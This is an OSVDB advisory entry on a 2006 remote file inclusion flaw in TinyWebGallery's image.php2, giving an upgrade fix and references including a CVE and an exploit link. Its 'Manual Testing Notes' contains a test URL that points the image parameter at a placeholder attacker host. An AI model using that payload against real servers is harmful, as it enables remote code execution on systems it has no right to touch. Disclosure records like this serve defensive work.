TinyWebGallery image.php2 image Variable Remote File Inclusion

2006-08-10T04:28:49
ID OSVDB:29368
Type osvdb
Reporter OSVDB
Modified 2006-08-10T04:28:49

Description

Solution Description

Upgrade to version 1.5.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/[path]/examples/examples/image.php2?image=http://[attacker]

References:

Security Tracker: 1016682 Related OSVDB ID: 29367 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0027.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0186.html ISS X-Force ID: 28317 Generic Exploit URL: http://www.milw0rm.com/exploits/2158 CVE-2006-4166